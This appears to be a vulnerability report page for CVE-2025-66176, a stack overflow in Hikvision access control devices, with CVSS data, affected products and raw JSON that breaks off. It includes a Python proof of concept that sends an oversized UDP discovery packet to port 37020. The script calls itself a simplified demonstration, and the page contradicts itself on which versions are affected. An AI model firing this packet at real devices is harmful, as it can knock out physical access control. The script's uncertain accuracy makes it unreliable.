Security Vulnerability Report
CVE-2025-66176 CVSS 8.8 HIGH

CVE-2025-66176

Published: 2026-01-13 03:16:01
Last Modified: 2026-03-18 16:16:24

Description

There is a stack overflow vulnerability in the device Search and Discovery feature of Hikvision Access Control Products. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:hikvision:ds-k1t331_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t331:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k1t341a_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t341a:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k1t341b_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t341b:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k1t671_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t671:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k5671_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k5671:-:*:*:*:*:*:*:* - NOT VULNERABLE
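Hikvision Access Control Products (firmware versions not listed; refer to the vendor's official advisory for the specific affected versions)
It is recommended to contact Hikvision directly for the complete list of affected product versions and security patch information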

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66176 PoC - Educational Purpose Only
# This code is for security research and defensive purposes only
import socket
import struct


def create_malicious_packet():
    """
    Create a malformed device discovery packet that could trigger
    the stack overflow in Hikvision Access Control products.
    Note: This is a simplified demonstration and may not work on all versions.
    """
    # Protocol header
    header = b'\x00\x01'  # Discovery protocol version
    # Command type - search response
    cmd_type = b'\x00\x04'
    # Create oversized payload to trigger buffer overflow
    # The actual overflow condition depends on the specific firmware version
    overflow_length = 2000  # Example length, actual may vary
    payload = b'A' * overflow_length
    # Construct packet
    packet = header + cmd_type + payload
    return packet


def send_exploit(target_ip, target_port=37020):
    """
    Send the exploit packet to target device.

    Args:
        target_ip: Target device IP address
        target_port: Target port (default 37020 for Hikvision discovery)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    packet = create_malicious_packet()
    try:
        sock.sendto(packet, (target_ip, target_port))
        print(f'[+] Malicious packet sent to {target_ip}:{target_port}')
        print(f'[+] Packet size: {len(packet)} bytes')
    except Exception as e:
        print(f'[-] Error: {e}')
    finally:
        sock.close()


if __name__ == '__main__':
    print('CVE-2025-66176 PoC - For authorized testing only')
    # Replace with authorized target
    # send_exploit('192.168.1.100')
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66176", "sourceIdentifier": "[email protected]", "published": "2026-01-13T03:16:01.097", "lastModified": "2026-03-18T16:16:23.943", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a Stack overflow Vulnerability in the device Search and Discovery feature of Hikvision Access Control Products. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device."}, {"lang": "es", "value": "Hay una vulnerabilidad de desbordamiento de pila en la función de búsqueda y descubrimiento de dispositivos de los productos de control de acceso de Hikvision. Si se explota, un atacante en la misma red de área local (LAN) podría causar un mal funcionamiento del dispositivo enviando paquetes especialmente diseñados a un dispositivo sin parchear."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t331_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "3FEF4CC2-2B13-4A80-8C57-68600AE9C93A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t331:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"9C6570A0-091A-49E4-8B04-650397FBD93D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t341a_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "0B6CAC82-004C-4919-9234-89004136537D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t341a:-:*:*:*:*:*:*:*", "matchCriteriaId": "595B2854-FCC2-4DC9-9821-7545FE940FAC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t341b_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "BA1A7F5D-F33C-4F15-8639-30CDCD7C1455"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t341b:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A7C6C26-52D1-4E9D-8448-29B78F692448"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t671_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "7841DA8E-1AE6-46F6-BB86-360B8624F85D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t671:-:*:*:*:*:*:*:*", "matchCriteriaId": "4B322AE4-4BE3-46EE-BFFD-730274270D52"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k5671_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "9362042E-F45C-43E3-9709-3D17DE1E476A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k5671:-:*:*:*:*:*:*:*", "matchCriteriaId": "33DF42F9-AA7B-4275-A0F5-6CD1C395379F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, 
"criteria": "cpe:2.3:o:hikvision:ds-k1t672_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "A68F9962-7C8E-46AF-BFA2-372191D585AA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t672:-:*:*:*:*:*:*:*", "matchCriteriaId": "58E41B4D-6601-4F72-BE90-1A119FFB3A0A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "E4F9199C-DEAD-430C-B2A7-FF493DAEB8EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t680:-:*:*:*:*:*:*:*", "matchCriteriaId": "9166334C-35C0-4220-AF7B-1964E32B4451"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t981_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80" ... (truncated)